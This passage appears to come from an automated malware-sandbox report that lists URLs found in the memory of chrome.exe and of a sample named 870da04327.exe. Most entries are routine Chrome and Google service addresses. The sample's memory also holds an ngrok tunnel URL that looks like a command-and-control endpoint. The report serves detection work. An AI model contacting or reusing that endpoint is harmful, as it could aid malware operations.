chrome.exe, 00000008.00000003.3197614520.0000219001224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3195286684.0000219000EF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3196454759.0000219000C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3195515566.00002190010AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000008.00000003.3197392314.0000219000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3196772060.0000219000F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3196574054.00002190006D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3196532911.0000219000958000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3195085707.0000219001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3195195706.0000219001090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3197551990.00002190011A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3222422931.000021900090B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3220394964.00002190004A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3195261412.00002190010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3197614520.0000219001224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3195286684.0000219000EF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3196454759.0000219000C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3195515566.00002190010AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000008.00000003.3197392314.0000219000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3196772060.0000219000F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3196574054.00002190006D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3196532911.0000219000958000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3195085707.0000219001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3195195706.0000219001090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3197551990.00002190011A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3222422931.000021900090B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3220394964.00002190004A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3195261412.00002190010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3197614520.0000219001224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3195286684.0000219000EF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3196454759.0000219000C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3195515566.00002190010AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000008.00000003.3197392314.0000219000380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3196772060.0000219000F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3196574054.00002190006D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3196532911.0000219000958000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3195085707.0000219001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3195195706.0000219001090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3197551990.00002190011A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3222422931.000021900090B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3220394964.00002190004A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3195261412.00002190010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3197614520.0000219001224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3195286684.0000219000EF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3196454759.0000219000C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3195515566.00002190010AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 00000008.00000002.3223080345.0000219000A1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: chrome.exe, 00000008.00000002.3222527685.0000219000930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 00000008.00000002.3222527685.0000219000930000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/6
Source: chrome.exe, 00000008.00000002.3222683310.0000219000964000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.gstatic.com/generate_204
Source: chrome.exe, 00000008.00000002.3223906969.0000219000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000008.00000002.3217285866.000021900008C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000008.00000002.3220225642.0000219000428000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000008.00000002.3217034436.000021900001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000008.00000002.3218831624.00002190001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000008.00000002.3223716105.0000219000B94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo?source=ChromiumBrowser
Source: chrome.exe, 00000008.00000002.3217285866.000021900008C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3217034436.000021900001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000008.00000002.3218831624.00002190001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000008.00000002.3223716105.0000219000B94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout?source=ChromiumBrowser&continue=https://accounts.google.com/chrom
Source: chrome.exe, 00000008.00000002.3218831624.00002190001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3224609978.0000219000D5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000008.00000002.3218831624.00002190001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000008.00000002.3217285866.00002190000A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin?source=ChromiumBrowser&issueuberauth=1
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000008.00000002.3217636423.00002190000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000008.00000002.3217636423.00002190000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000008.00000002.3217636423.00002190000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000008.00000002.3217285866.000021900008C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3224609978.0000219000D5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3224609978.0000219000D5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000008.00000002.3218831624.00002190001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: 870da04327.exe, 00000007.00000003.2850266687.00000000071D2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: 870da04327.exe, 00000007.00000003.2850266687.00000000071D2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: chrome.exe, 00000008.00000002.3223716105.0000219000B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3190918241.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3188468756.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191011715.00002190006D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000008.00000002.3223716105.0000219000B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3190918241.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3188468756.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191011715.00002190006D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000008.00000002.3223716105.0000219000B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3190918241.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3188468756.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191011715.00002190006D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000008.00000002.3223716105.0000219000B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3190918241.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3188468756.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191011715.00002190006D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000008.00000002.3223716105.0000219000B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3190918241.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3188468756.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191011715.00002190006D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000008.00000002.3223716105.0000219000B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3190918241.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3188468756.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191011715.00002190006D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000008.00000002.3223530671.0000219000B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3190918241.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3188468756.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191011715.00002190006D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000008.00000002.3223530671.0000219000B00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/72466
Source: chrome.exe, 00000008.00000002.3223716105.0000219000B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3190918241.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3188468756.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191011715.00002190006D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000008.00000002.3223530671.0000219000B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3190918241.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3188468756.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191011715.00002190006D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000008.00000002.3223716105.0000219000B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3190918241.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3188468756.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191011715.00002190006D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000008.00000002.3223716105.0000219000B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3190918241.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3188468756.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191011715.00002190006D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000008.00000002.3223716105.0000219000B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3190918241.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3188468756.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191011715.00002190006D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000008.00000002.3223716105.0000219000B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3190918241.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3188468756.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191011715.00002190006D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000008.00000002.3223716105.0000219000B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3190918241.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3188468756.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191011715.00002190006D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000008.00000002.3223716105.0000219000B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3190918241.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3188468756.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191011715.00002190006D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000008.00000002.3223716105.0000219000B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3190918241.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3188468756.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191011715.00002190006D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000008.00000002.3223716105.0000219000B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3190918241.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3188468756.00002190003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191011715.00002190006D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000008.00000002.3222280682.00002190008A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3220611083.000021900050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3220842992.00002190005D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3224425824.0000219000D24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000008.00000002.3223906969.0000219000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: chrome.exe, 00000008.00000002.3223816230.0000219000BDC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000008.00000002.3223816230.0000219000BDC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: chrome.exe, 00000008.00000002.3223755638.0000219000BCC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000008.00000002.3223755638.0000219000BCC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000008.00000002.3223755638.0000219000BCC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: chrome.exe, 00000008.00000002.3221461672.0000219000688000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000008.00000003.3192451949.0000219000F40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000008.00000002.3221379808.000021900064C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000008.00000002.3218831624.00002190001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3222683310.0000219000964000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000008.00000002.3218831624.00002190001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=ene2/crx
Source: chrome.exe, 00000008.00000003.3191293829.0000219000C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3224188006.0000219000CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3194099525.0000219000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3194628212.000021900034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3192479033.0000219000C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3196968147.0000219000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3191509150.0000219000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3221963334.000021900080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3195865115.0000219000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3192451949.0000219000F40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000008.00000002.3229811384.00002CF000920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000008.00000003.3178757220.00002CF00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3178887771.00002CF000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3230108821.00002CF000974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000008.00000002.3229811384.00002CF000920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000008.00000003.3178757220.00002CF00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3178887771.00002CF000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3230108821.00002CF000974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000008.00000002.3229811384.00002CF000920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000008.00000002.3229811384.00002CF000920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000008.00000003.3178757220.00002CF00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3178887771.00002CF000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3230108821.00002CF000974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000008.00000002.3217034436.000021900001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000008.00000002.3224000137.0000219000C4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000008.00000002.3218831624.00002190001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000008.00000002.3218831624.00002190001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/g
Source: chrome.exe, 00000008.00000003.3175041528.00000ED8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3175062507.00000ED8002E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000008.00000002.3222422931.0000219000900000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3219242686.000021900020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.3185297866.00002190004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3222172809.0000219000878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3221420050.0000219000668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3222361078.00002190008E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3217034436.000021900001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3221814691.0000219000790000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000008.00000002.3223494833.0000219000AE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
Source: chrome.exe, 00000008.00000002.3221461672.0000219000688000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000008.00000002.3221461672.0000219000688000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000008.00000002.3222280682.00002190008A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000008.00000002.3218831624.00002190001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000008.00000002.3218831624.00002190001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000008.00000002.3217084372.0000219000054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3221420050.0000219000668000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chrome.exe, 00000008.00000002.3219466201.0000219000298000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/368855.)
Source: 870da04327.exe, 00000007.00000003.2850266687.00000000071D2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 870da04327.exe, 00000007.00000003.2850266687.00000000071D2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: 870da04327.exe, 00000007.00000003.2850266687.00000000071D2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: chrome.exe, 00000008.00000002.3219851964.000021900032C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.goog
Source: chrome.exe, 00000008.00000002.3219851964.000021900032C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.googl0
Source: chrome.exe, 00000008.00000002.3219851964.000021900032C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000008.00000002.3221420050.0000219000668000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/
Source: chrome.exe, 00000008.00000002.3222172809.0000219000878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3221269075.0000219000632000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000008.00000002.3221216418.000021900061C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3224000137.0000219000C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.3221269075.0000219000632000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
